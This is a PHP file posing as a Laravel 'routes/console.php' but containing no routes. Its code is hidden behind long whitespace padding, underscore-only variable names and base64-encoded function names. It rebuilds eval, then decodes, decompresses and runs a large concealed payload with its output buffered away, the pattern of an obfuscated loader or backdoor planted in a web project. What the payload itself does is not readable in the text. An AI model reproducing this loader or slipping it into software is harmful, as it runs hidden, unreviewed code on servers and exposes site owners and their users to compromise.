<?php 
        $__='printf';$_='Loading routes/console.php';
        











































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































                                                                                                                                                                                                                     $________;
